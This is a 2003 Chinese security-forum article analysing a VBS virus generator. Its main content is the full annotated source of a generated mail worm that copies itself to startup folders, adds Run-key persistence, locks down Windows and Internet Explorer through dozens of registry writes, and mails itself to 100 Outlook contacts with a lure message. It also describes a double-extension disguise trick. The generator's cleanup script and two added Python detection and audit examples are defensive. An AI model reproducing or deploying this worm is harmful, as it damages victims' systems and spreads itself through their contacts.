VBS Virus Generator v1.0: Analysis Report
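Author: CyberSpy
QQ: 18988418
Email: duguqiuai1357@163.com
Date: 2003.04.08
###Welcome to www.20cn.net, the 20cn Network Security Team###
Warning: this article is only a technical analysis. I hope nobody misuses it; I accept no responsibility for any consequences. Keep that in mind.
The virus generator: this is a typical virus generator that is popular online (a virus generator, as the name says, is a machine that makes viruses (^_^ stating the obvious)). It is used for point-and-click creation of VBS viruses (a VBS virus is written in Visual Basic Script, i.e. VB script, which runs under Microsoft's Windows Script Host, a language-independent script interpretation mechanism for 32-bit Windows platforms that lets scripts run directly on the Windows desktop or at the command prompt. Through WSH a user can manipulate WSH objects, ActiveX objects, the registry and the file system. Powerful, isn't it? Scared yet?!).
The program was probably written in VB (I did not ask the author for details) and calls three system dynamic link libraries: kernel32.dll, user32.dll and advapi32.dll. Here kernel32.dll is mainly used for system control, including process creation, variable settings, virtual memory management, system resource management and so on; it is one of the libraries the operating system cannot do without. user32.dll is mainly used for communication with the user, including message passing and echo. advapi32.dll is mainly the API interface between the program and the system, here a handful of registry operations: RegOpenKey (obtain a handle to a SubKey), RegCloseKey (close a SubKey that was opened or created) and RegQueryValueEx (read the value of a given key).
Below is the source code of a *.vbs script virus obtained by running the generator (with every offered option selected, i.e. the "nastiest" payload; put plainly, all destructive functions chosen, as virulent as it gets). All major antivirus products flag it as a vbs.xxxxx virus. I have added some comments of my own. (Change the name, for example to xxxx.txt .vbs, with N spaces between the first and second extension. Quite deceptive, isn't it? Watch out for this trick from now on (it is a form of social engineering too ^_^). It can then be sent by e-mail or spread in other ways to do damage. Please never do that, haha! Don't be a bad guy! Be a good person!)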
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject") 'Create an object for talking to the operating system (FileSystemObject gives file-system access; the registry writes below go through WScript.Shell)
Set dir1=fs.GetSpecialFolder(0) 'Get the location of the Windows/WinNT folder
Set dir2=fs.GetSpecialFolder(1) 'Get the location of the System32/System folder
Set so=CreateObject("Scripting.FileSystemObject")
dim r 'Declare a variable
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs") 'Copy the virus to the Windows/WinNT folder
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs") 'Copy the virus to the System32/System folder
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\Win32system.vbs") 'Copy the virus to the Start Menu startup folder
'Below: malicious registry modifications and simple propagation via OE
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD" 'Modify the registry: disable the "Run" menu item
r.Regwrite "KCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD" 'Modify the registry: disable the "Shut Down" menu item
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD" 'Modify the registry: hide all logical drive letters
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD" 'Modify the registry: disable registry editing
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","" 'Modify the registry: disable the registry scan at startup
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD" 'Modify the registry: disable the "Log Off" menu item
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD" 'Modify the registry: disable MS-DOS real mode
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs" 'Modify the registry: make this script run automatically at startup
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD" 'Modify the registry: hide the desktop icons
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD" 'Modify the registry: disable pure DOS mode
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD" 'Modify the registry: disable the "Taskbar and Start Menu" item
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD" 'Modify the registry: disable the right-click menu
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD" 'Modify the registry: disable Control Panel
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile" 'Modify the registry: block importing .reg files by associating them with txt files instead
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","警告" 'Set the title of the startup notice box
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","您中vbs脚本病毒了,哭吧~" 'Set the text of the startup notice box
Set ol=CreateObject("Outlook.Application") 'Create an Outlook application object used for propagation
On Error Resume Next
For x=1 To 100
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) 'Sends this VBS virus to the first 100 entries in the address book; a simple, dumb worm of sorts~~
Mail.Subject="今晚你来吗?" 'Mail subject
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" 'Mail body
Mail.Attachments.Add(dir2&"Win32system.vbs")
Mail.Send
Next
ol.Quit
'Below: malicious modifications to Internet Explorer options
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD" 'Modify the registry: disable the right mouse button
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD" 'Modify the registry: disable Internet Options
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD" 'Modify the registry: disable "Save As"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD" 'Modify the registry: disable the "File/Open" menu item
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD" 'Modify the registry: block changes to the Advanced tab settings
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD" 'Modify the registry: block changes to the temporary files settings
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD" 'Modify the registry: block changes to automatic configuration
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD" 'Modify the registry: block changing the home page, i.e. "Home page" is greyed out
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD" 'Modify the registry: block changes to the history settings
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD" 'Modify the registry: block changes via the Internet Connection Wizard
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD" 'Modify the registry: block changes to the Security tab
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD" 'Modify the registry: disable "Reset Web Settings"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD" 'Modify the registry: disable View Source
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD" 'Modify the registry: block adding offline schedules
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD" 'Modify the registry: disable the "File" menu
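Added example (not part of the original article or of the generator's output): a static triage in Python that flags the behaviours annotated in the listing above, plus the double-extension file name trick described earlier, without executing anything. The rule names, the `triage` function and its verdict labels are assumptions of this example; the sample lines are abridged from the listing and held as text only.

```python
import re

# Behaviours called out in the annotated listing, as case-insensitive patterns.
RULES = {
    "error_suppression": re.compile(r"^\s*On Error Resume Next", re.I | re.M),
    "self_copy": re.compile(
        r"GetFile\s*\(\s*WScript\.ScriptFullName\s*\)\s*\.Copy", re.I),
    "autorun_persistence": re.compile(
        r'RegWrite\s+"HK(?:LM|CU)\\Software\\Microsoft\\Windows'
        r'\\CurrentVersion\\Run(?:Once)?\\', re.I),
    "policy_lockdown": re.compile(
        r'RegWrite\s+"HKCU\\Software\\(?:Microsoft\\Windows\\CurrentVersion'
        r'\\Policies|Policies\\Microsoft)\\', re.I),
    "outlook_automation": re.compile(
        r'CreateObject\s*\(\s*"Outlook\.Application"', re.I),
    "address_book_walk": re.compile(
        r"AddressLists\s*\(.*?\)\s*\.AddressEntries", re.I),
}
# Harmless-looking extension, optional space padding, then a WSH script extension.
DOUBLE_EXT = re.compile(r"\.(?:txt|doc|jpg|gif|htm)\s*\.(?:vbs|vbe|js|jse|wsf)$", re.I)
WORM_SET = {"self_copy", "outlook_automation", "address_book_walk"}

def triage(filename, source):
    """Return (verdict, sorted list of matched indicator names)."""
    hits = {name for name, rx in RULES.items() if rx.search(source)}
    if DOUBLE_EXT.search(filename.strip()):
        hits.add("double_extension")
    if WORM_SET <= hits:
        verdict = "mail-worm"
    elif len(hits) >= 2:
        verdict = "suspicious"
    else:
        verdict = "low"
    return verdict, sorted(hits)

# Constructed sample: a few lines abridged from the listing above, text only.
SAMPLE = r'''
On Error Resume Next
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs")
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
Set ol=CreateObject("Outlook.Application")
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
'''
# Constructed benign script for contrast.
BENIGN = 'Set fs=CreateObject("Scripting.FileSystemObject")\nWScript.Echo fs.GetSpecialFolder(0)\n'

if __name__ == "__main__":
    print(triage("xxxx.txt   .vbs", SAMPLE))
    print(triage("inventory.vbs", BENIGN))
```

The patterns match raw text, so a hit inside a comment still counts; for triage that errs in the safe direction.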
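Below is the "antidote" provided by the author: the source code of the recovery file reset.vbs:
(Since it is exactly the reverse of the malicious modifications made by the virus above, I have not commented it.)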
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir2&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Start Menu\Programs\启动\Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","scanregw.exe /autorun"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system",""
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption",""
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText",""
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",0,"REG_DWORD"
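Added example (not the tool author's code): checking reset.vbs against the generated script by comparing their RegWrite targets. Run on lines abridged from the two listings, it shows that the `.reg` association written by the generated script is never restored, and that the RunOnce clean-up entries share one value name, so only the last write survives. `regwrites` and `audit_reset` are names chosen for this example.

```python
import re

# One RegWrite call per line: capture the value path and the rest of the line.
REGWRITE = re.compile(r'\.RegWrite\s+"([^"]+)"\s*,\s*(.+)$', re.I | re.M)

def regwrites(script):
    """Return [(lower-cased value path, data expression)] in source order."""
    return [(m.group(1).lower(), m.group(2).strip())
            for m in REGWRITE.finditer(script)]

def audit_reset(payload, reset):
    """Compare a payload's registry writes with a cleanup script's.

    Returns (not_reverted, overwritten):
      not_reverted - paths the payload writes that the cleanup never touches
      overwritten  - paths the cleanup writes repeatedly with different data,
                     so only the last write survives
    """
    payload_paths = {path for path, _ in regwrites(payload)}
    last, overwritten = {}, []
    for path, expr in regwrites(reset):
        if path in last and last[path] != expr and path not in overwritten:
            overwritten.append(path)
        last[path] = expr
    not_reverted = sorted(payload_paths - set(last))
    return not_reverted, overwritten

# Constructed samples: lines abridged from the two listings above, text only.
PAYLOAD = r'''
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
'''
RESET = r'''
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir2&"\Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system",""
'''

if __name__ == "__main__":
    missing, clobbered = audit_reset(PAYLOAD, RESET)
    print("not reverted:", missing)
    print("overwritten :", clobbered)
```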
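After the analysis above, doesn't everyone feel that VBS viruses are really too simple? Indeed they are: that is all there is to a VBS worm. The virus this generator produces is very much beginner level, yet its frightening destructive functions really do make one break out in a cold sweat. Even the most skilled expert, faced with a registry damaged this badly, would end up reinstalling the system (if not, that only shows that his or her patience deserves our deepest respect ¥#¥). So this virus is simply too nasty, too vicious. There is not much technical substance in it and nothing new. In terms of infectivity and stealth it is also quite ordinary.
Finally, I solemnly state once more: please do not do anything illegal, or the "white hats" may invite you in for tea.
Pure technical research deserves to be encouraged.
PS: If anything in the analysis above is wrong, corrections are welcome. Thank you.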
===============================================
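Copyright of this article belongs to the 20CN Network Security Team and its author. If you reproduce it, please keep the article intact and credit the source.
Article type: original. Submitted by: CyberSpy. Reviewed by: NetDemon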